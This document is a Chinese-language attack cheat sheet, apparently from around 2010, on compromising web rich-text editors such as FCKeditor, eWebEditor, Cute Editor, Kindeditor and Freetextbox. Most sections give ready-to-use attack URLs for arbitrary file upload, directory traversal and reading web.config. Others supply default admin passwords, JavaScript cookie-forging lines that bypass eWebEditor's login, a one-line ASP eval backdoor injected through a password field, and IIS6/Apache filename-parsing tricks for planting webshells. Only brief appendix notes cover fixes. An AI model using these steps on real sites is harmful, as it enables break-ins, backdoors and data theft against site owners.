FCKeditor

　　FCKeditor編輯器頁/查看編輯器版本/查看文件上傳路徑

　　FCKeditor編輯器頁

　　FCKeditor/_samples/default.html

　　查看編輯器版本

　　FCKeditor/_whatsnew.html

　　查看文件上傳路徑

　　fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

　　XML頁面中第二行 “url=/xxx”的部分就是默認(rèn)基準(zhǔn)上傳路徑

　　Note:[Hell1]截至2010年02月15日最新版本為FCKeditor v2.6.6

　　[Hell2]記得修改其中兩處asp為FCKeditor實際使用的腳本語言

　　FCKeditor被動限制策略所導(dǎo)致的過濾不嚴(yán)問題

　　影響版本: FCKeditor x.x <= FCKeditor v2.4.3

　　脆弱描述：

　　FCKeditor v2.4.3中File類別默認(rèn)拒絕上傳類型：html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|

　　pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

　　Fckeditor 2.0 <= 2.2允許上傳asa、cer、php2、php4、inc、pwml、pht后綴的文件

　　上傳后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而沒有使用$sExtension為后綴

　　直接導(dǎo)致在win下在上傳文件后面加個.來突破[未測試]

　　而在apache下，因為"Apache文件名解析缺陷漏洞"也可以利用之，詳見"附錄A"

　　另建議其他上傳漏洞中定義TYPE變量時使用File類別來上傳文件,根據(jù)FCKeditor的代碼，其限制最為狹隘。

　　攻擊利用:

　　允許其他任何后綴上傳

　　利用2003路徑解析漏洞上傳網(wǎng)馬

　　影響版本: 附錄B

　　脆弱描述：

　　利用2003系統(tǒng)路徑解析漏洞的原理，創(chuàng)建類似“bin.asp”如此一般的目錄，再在此目錄中上傳文件即可被腳本解釋器以相應(yīng)腳本權(quán)限執(zhí)行。

　　攻擊利用:

　　fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

　　FCKeditor PHP上傳任意文件漏洞

　　影響版本: FCKeditor 2.2 <= FCKeditor 2.4.2

　　脆弱描述：

　　FCKeditor在處理文件上傳時存在輸入驗證錯誤，遠(yuǎn)程攻擊可以利用此漏洞上傳任意文件。

　　在通過editor/filemanager/upload/php/upload.php上傳文件時攻擊者可以通過為Type參數(shù)定義無效的值導(dǎo)致上傳任意腳本。

　　成功攻擊要求config.php配置文件中啟用文件上傳，而默認(rèn)是禁用的。攻擊利用: (請修改action字段為指定網(wǎng)址)：

　　FCKeditor 《=2.4.2 for php.html

　　Note:如想嘗試v2.2版漏洞，則修改Type=任意值 即可，但注意，如果換回使用Media則必須大寫首字母M,否則LINUX下，F(xiàn)CKeditor會對文件目錄進(jìn)行文件名校驗，不會上傳成功的。

　　TYPE自定義變量任意上傳文件漏洞

　　影響版本: 較早版本

　　脆弱描述：

　　通過自定義Type變量的參數(shù)，可以創(chuàng)建或上傳文件到指定的目錄中去，且沒有上傳文件格式的限制。

　　攻擊利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp

　　打開這個地址就可以上傳任何類型的文件了，Shell上傳到的默認(rèn)位置是:

　　http://www.heimian.com/UserFiles/all/1.asp

　　"Type=all" 這個變量是自定義的,在這里創(chuàng)建了all這個目錄,而且新的目錄沒有上傳文件格式的限制.

　　比如輸入:

　　/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp

　　網(wǎng)馬就可以傳到網(wǎng)站的根目錄下.

　　Note:如找不到默認(rèn)上傳文件夾可檢查此文件: fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

　　FCKeditor 新聞組件遍歷目錄漏洞

　　影響版本:aspx版FCKeditor，其余版本未測試

　　脆弱描述：如何獲得webshell請參考上文“TYPE自定義變量任意上傳文件漏洞”

　　攻擊利用:

　　修改CurrentFolder參數(shù)使用 ../../來進(jìn)入不同的目錄

　　/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp

　　根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄。

　　/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

　　FCKeditor中webshell的其他上傳方式

　　影響版本:非優(yōu)化/精簡版本的FCKeditor

　　脆弱描述：

　　如果存在以下文件，打開后即可上傳文件。

　　攻擊利用:

　　fckeditor/editor/filemanager/upload/test.html

　　fckeditor/editor/filemanager/browser/default/connectors/test.html

　　FCKeditor 文件上傳“.”變“_”下劃線的繞過方法

　　影響版本: FCKeditor => 2.4.x

　　脆弱描述：

　　我們上傳的文件例如：shell.php.rar或shell.php;.jpg會變?yōu)閟hell_php;.jpg這是新版FCK的變化。

　　攻擊利用:

　　提交1.php+空格 就可以繞過去所有的,

　　※不過空格只支持win系統(tǒng) *nix是不支持的[1.php和1.php+空格是2個不同的文件]

　　Note:upload/2010/3/201003102334372778.jpg 這樣的格式做了過濾。也就是IIS6解析漏洞。

　　上傳第一次。被過濾為123_asp;123.jpg 從而無法運行。

　　但是第2次上傳同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已經(jīng)存在。

　　文件名被命名為123.asp;123(1).jpg …… 123.asp;123(2).jpg這樣的編號方式。

　　所以。IIS6的漏洞繼續(xù)執(zhí)行了。

　　如果通過上面的步驟進(jìn)行測試沒有成功，可能有以下幾方面的原因：

　　1.FCKeditor沒有開啟文件上傳功能，這項功能在安裝FCKeditor時默認(rèn)是關(guān)閉的。如果想上傳文件，F(xiàn)CKeditor會給出錯誤提示。

　　2.網(wǎng)站采用了精簡版的FCKeditor，精簡版的FCKeditor很多功能丟失，包括文件上傳功能。

　　3.FCKeditor的這個漏洞已經(jīng)被修復(fù)。

　　--------------------------------------------------------------------------------

　　eWebEditor

　　eWebEditor利用基礎(chǔ)知識

　　默認(rèn)后臺地址：/ewebeditor/admin_login.asp

　　建議最好檢測下admin_style.asp文件是否可以直接訪問

　　默認(rèn)數(shù)據(jù)庫路徑：[PATH]/db/ewebeditor.mdb

　　[PATH]/db/db.mdb -- 某些CMS里是這個數(shù)據(jù)庫

　　也可嘗試 [PATH]/db/%23ewebeditor.mdb -- 某些管理員自作聰明的小伎倆

　　使用默認(rèn)密碼：admin/admin888 或 admin/admin 進(jìn)入后臺，也可嘗試 admin/123456 (有些管理員以及一些CMS，就是這么設(shè)置的)

　　點擊“樣式管理”--可以選擇新增樣式，或者修改一個非系統(tǒng)樣式，將其中圖片控件所允許的上傳類型后面加上|asp、|asa、|aaspsp或|cer，只要是服務(wù)器允許執(zhí)行的腳本類型即可，點擊“提交”并設(shè)置工具欄--將“插入圖片”控件添加上。而后--預(yù)覽此樣式，點擊插入圖片，上傳WEBSHELL，在“代碼”模式中查看上傳文件的路徑。

　　2、當(dāng)數(shù)據(jù)庫被管理員修改為asp、asa后綴的時候，可以插一句話木馬服務(wù)端進(jìn)入數(shù)據(jù)庫，然后一句話木馬客戶端連接拿下webshell

　　3、上傳后無法執(zhí)行?目錄沒權(quán)限?帥鍋你回去樣式管理看你編輯過的那個樣式，里面可以自定義上傳路徑的!!!

　　4、設(shè)置好了上傳類型，依然上傳不了麼?估計是文件代碼被改了，可以嘗試設(shè)定“遠(yuǎn)程類型”依照6.0版本拿SHELL的方法來做(詳情見下文↓)，能夠設(shè)定自動保存遠(yuǎn)程文件的類型。

　　5、不能添加工具欄，但設(shè)定好了某樣式中的文件類型，怎么辦?↓這么辦!

　　(請修改action字段)

　　Action.html

　　eWebEditor踩腳印式入侵

　　脆弱描述：

　　當(dāng)我們下載數(shù)據(jù)庫后查詢不到密碼MD5的明文時，可以去看看webeditor_style(14)這個樣式表，看看是否有前輩入侵過 或許已經(jīng)賦予了某控件上傳腳本的能力，構(gòu)造地址來上傳我們自己的WEBSHELL.

　　攻擊利用:

　　比如 ID=46 s-name =standard1

　　構(gòu)造 代碼: ewebeditor.asp?id=content&style=standard

　　ID和和樣式名改過后

　　ewebeditor.asp?id=46&style=standard1

　　eWebEditor遍歷目錄漏洞

　　脆弱描述：

　　ewebeditor/admin_uploadfile.asp

　　admin/upload.asp

　　過濾不嚴(yán)，造成遍歷目錄漏洞

　　攻擊利用:

　　第一種:ewebeditor/admin_uploadfile.asp?id=14

　　在id=14后面添加&dir=..

　　再加 &dir=../..

　　&dir=http://www.heimian.com/../.. 看到整個網(wǎng)站文件了

　　第二種: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..

　　eWebEditor 5.2 列目錄漏洞

　　脆弱描述：

　　ewebeditor/asp/browse.asp

　　過濾不嚴(yán)，造成遍歷目錄漏洞

　　攻擊利用：

　　http://www.dbjr.com.cn/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..

　　利用WebEditor session欺騙漏洞,進(jìn)入后臺

　　脆弱描述：

　　漏洞文件:Admin_Private.asp

　　只判斷了session，沒有判斷cookies和路徑的驗證問題。

　　攻擊利用:

　　新建一個test.asp內(nèi)容如下:

　　
　　訪問test.asp，再訪問后臺任何文件，for example:Admin_Default.asp

　　eWebEditor asp版 2.1.6 上傳漏洞

　　攻擊利用:(請修改action字段為指定網(wǎng)址)

　　ewebeditor asp版2.1.6上傳漏洞利用程序.html

　　eWebEditor 2.7.0 注入漏洞

　　攻擊利用:

　　http://www.dbjr.com.cn/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

　　默認(rèn)表名：eWebEditor_System默認(rèn)列名：sys_UserName、sys_UserPass，然后利用nbsi進(jìn)行猜解.

　　eWebEditor2.8.0最終版刪除任意文件漏洞

　　脆弱描述：

　　此漏洞存在于Example\NewsSystem目錄下的delete.asp文件中，這是ewebeditor的測試頁面，無須登陸可以直接進(jìn)入。

　　攻擊利用: (請修改action字段為指定網(wǎng)址)

　　Del Files.html

　　eWebEditor v6.0.0 上傳漏洞

　　攻擊利用:

　　在編輯器中點擊“插入圖片”--網(wǎng)絡(luò)--輸入你的WEBSHELL在某空間上的地址(注：文件名稱必須為：xxx.jpg.asp 以此類推…)，確定后，點擊“遠(yuǎn)程文件自動上傳”控件(第一次上傳會提示你安裝控件，稍等即可)，查看“代碼”模式找到文件上傳路徑，訪問即可，eweb官方的DEMO也可以這么做，不過對上傳目錄取消掉了執(zhí)行權(quán)限，所以上傳上去也無法執(zhí)行網(wǎng)馬.

　　eWebEditor PHP/ASP…后臺通殺漏洞

　　影響版本: PHP ≥ 3.0~3.8與asp 2.8版也通用，或許低版本也可以，有待測試。

　　攻擊利用:

　　進(jìn)入后臺/eWebEditor/admin/login.php,隨便輸入一個用戶和密碼,會提示出錯了.

　　這時候你清空瀏覽器的url,然后輸入

　　javascript:alert(document.cookie="adminuser="+escape("admin"));

　　javascript:alert(document.cookie="adminpass="+escape("admin"));

　　javascript:alert(document.cookie="admindj="+escape("1"));

　　而后三次回車,清空瀏覽器的URL,現(xiàn)在輸入一些平常訪問不到的文件如../ewebeditor/admin/default.php，就會直接進(jìn)去。

　　eWebEditor for php任意文件上傳漏洞

　　影響版本:ewebeditor php v3.8 or older version

　　脆弱描述:

　　此版本將所有的風(fēng)格配置信息保存為一個數(shù)組$aStyle,在php.ini配置register_global為on的情況下我們可以任意添加自己喜歡的風(fēng)格，并定義上傳類型。

　　攻擊利用:

　　phpupload.html

　　eWebEditor JSP版漏洞

　　大同小異，我在本文檔不想多說了，因為沒環(huán)境 測試，網(wǎng)上垃圾場那么大，不好排查。用JSP編輯器的我覺得eweb會比FCKeditor份額少得多。

　　eWebEditor 2.8 商業(yè)版插一句話木馬

　　影響版本:=>2.8 商業(yè)版

　　攻擊利用:

　　登陸后臺，點擊修改密碼---新密碼設(shè)置為 1":eval request("h")'

　　設(shè)置成功后，訪問asp/config.asp文件即可，一句話木馬被寫入到這個文件里面了.

　　eWebEditorNet upload.aspx 上傳漏洞(WebEditorNet)

　　脆弱描述：

　　WebEditorNet 主要是一個upload.aspx文件存在上傳漏洞。

　　攻擊利用:

　　默認(rèn)上傳地址：/ewebeditornet/upload.aspx

　　可以直接上傳一個cer的木馬

　　如果不能上傳則在瀏覽器地址欄中輸入javascript:lbtnUpload.click();

　　成功以后查看源代碼找到uploadsave查看上傳保存地址，默認(rèn)傳到uploadfile這個文件夾里。

　　southidceditor(一般使用v2.8.0版eWeb核心)

　　idceditor/datas/southidceditor.mdb">http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb

　　http://www.safe5com/admin/southidceditor/admin/admin_login.asp

　　http://www.dbjr.com.cn/admin/southidceditor/popup.asp

　　bigcneditor(eWeb 2.7.5 VIP核心)

　　其實所謂的Bigcneditor就是eWebEditor 2.7.5的VIP用戶版.之所以無法訪問admin_login.asp，提示“權(quán)限不夠”4字真言，估計就是因為其授權(quán)“Licensed”問題,或許只允許被授權(quán)的機器訪問后臺才對。

　　或許上面針對eWebEditor v2.8以下低版本的小動作可以用到這上面來.貌似沒多少動作?

　　--------------------------------------------------------------------------------

　　Cute Editor

　　Cute Editor在線編輯器本地包含漏洞

　　影響版本:

　　CuteEditor For Net 6.4

　　脆弱描述：

　　可以隨意查看網(wǎng)站文件內(nèi)容，危害較大。

　　攻擊利用:

　　http://www.dbjr.com.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

　　--------------------------------------------------------------------------------

　　Webhtmleditor

　　利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL

　　影響版本：<= Webhtmleditor最終版1.7 (已停止更新)

　　脆弱描述/攻擊利用：

　　對上傳的圖片或其他文件無重命名操作，導(dǎo)致允許惡意用戶上傳diy.asp;.jpg來繞過對后綴名審查的限制，對于此類因編輯器作者意識犯下的錯誤，就算遭遇縮略圖，文件頭檢測，也可使用圖片木馬 插入一句話來突破。

　　--------------------------------------------------------------------------------

　　Kindeditor

　　利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL

　　影響版本: <= kindeditor 3.2.1(09年8月份發(fā)布的最新版)

　　脆弱描述/攻擊利用：

　　拿官方做個演示：進(jìn)入upload/2010/3/201003102334381513.jpg 大家可以前去圍觀。

　　Note:參見附錄C原理解析。

　　--------------------------------------------------------------------------------

　　Freetextbox

　　Freetextbox遍歷目錄漏洞

　　影響版本：未知

　　脆弱描述：

　　因為ftb.imagegallery.aspx代碼中 只過濾了/但是沒有過濾\符號所以導(dǎo)致出現(xiàn)了遍歷目錄的問題。

　　攻擊利用:

　　在編輯器頁面點圖片會彈出一個框(抓包得到此地址)構(gòu)造如下，可遍歷目錄。

　　http://www.dbjr.com.cn/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..

　　--------------------------------------------------------------------------------

　　附錄A：

　　Apache文件名解析缺陷漏洞：

　　測試環(huán)境:apache 2.0.53 winxp,apache 2.0.52 redhat linux

　　1.國外(SSR TEAM)發(fā)了多個advisory稱Apache's MIME module (mod_mime)相關(guān)漏洞,就是attack.php.rar會被當(dāng)做php文件執(zhí)行的漏洞，包括Discuz!那個p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。

　　2.S4T的superhei在blog上發(fā)布了這個apache的小特性，即apache 是從后面開始檢查后綴，按最后一個合法后綴執(zhí)行。其實只要看一下apache的htdocs那些默認(rèn)安裝的index.XX文件就明白了。

　　3.superhei已經(jīng)說的非常清楚了，可以充分利用在上傳漏洞上，我按照普遍允許上傳的文件格式測試了一下，列舉如下(亂分類勿怪)

　　典型型:rar

　　備份型:bak,lock

　　流媒體型：wma,wmv,asx,as,mp4,rmvb

　　微軟型:sql,chm,hlp,shtml,asp

　　任意型:test,fake,ph4nt0m

　　特殊型:torrent

　　程序型：jsp,c,cpp,pl,cgi

　　4.整個漏洞的關(guān)鍵就是apache的"合法后綴"到底是哪些，不是"合法后綴"的都可以被利用。

　　5.測試環(huán)境

　　a.php

　　
　　然后增加任意后綴測試,a.php.aaa,a.php.aab....

　　By cloie, in ph4nt0m.net(c) Security.

　　附錄B：

　　安裝了iis6的服務(wù)器(windows2003)，受影響的文件名后綴有.asp .asa .cdx .cer .pl .php .cgi

　　Windows 2003 Enterprise Edition是微軟目前主流的服務(wù)器操作系統(tǒng)。 Windows 2003 IIS6 存在著文件解析路徑的漏洞，當(dāng)文件夾名為類似hack.asp的時候(即文件夾名看起來像一個ASP文件的文件名)，此時此文件夾下的任何類型的文件(比如.gif，.jpg，.txt等)都可以在IIS中被當(dāng)做ASP程序來執(zhí)行。這樣黑客即可上傳擴展名為jpg或gif之類的看起來像是圖片文件的木馬文件，通過訪問這個文件即可運行木馬。如果這些網(wǎng)站中有任何一個文件夾的名字是以 .asp .php .cer .asa .cgi .pl 等結(jié)尾，那么放在這些文件夾下面的任何類型的文件都有可能被認(rèn)為是腳本文件而交給腳本解析器而執(zhí)行。

　　附錄C：

　　漏洞描述：

　　當(dāng)文件名為[YYY].asp;[ZZZ].jpg時，Microsoft IIS會自動以asp格式來進(jìn)行解析。

　　而當(dāng)文件名為[YYY].php;[ZZZ].jpg時，Microsoft IIS會自動以php格式來進(jìn)行解析。

　　其中[YYY]與[ZZZ]處為可變化字符串。

　　影響平臺：

　　Windows Server 2000 / 2003 / 2003 R2 (IIS 5.x / 6.0)

　　修補方法：

　　1、等待微軟相關(guān)的補丁包

　　2、關(guān)閉圖片所在目錄的腳本執(zhí)行權(quán)限(前提是你的某些圖片沒有與程序混合存放)

　　3、校驗網(wǎng)站程序中所有上傳圖片的代碼段，對形如[YYY].asp;[ZZZ].jpg的圖片做攔截

　　備注：

　　對于Windows Server 2008(IIS7)以及Windows Server 2008 R2(IIS7.5) 則未受影響.

最新評論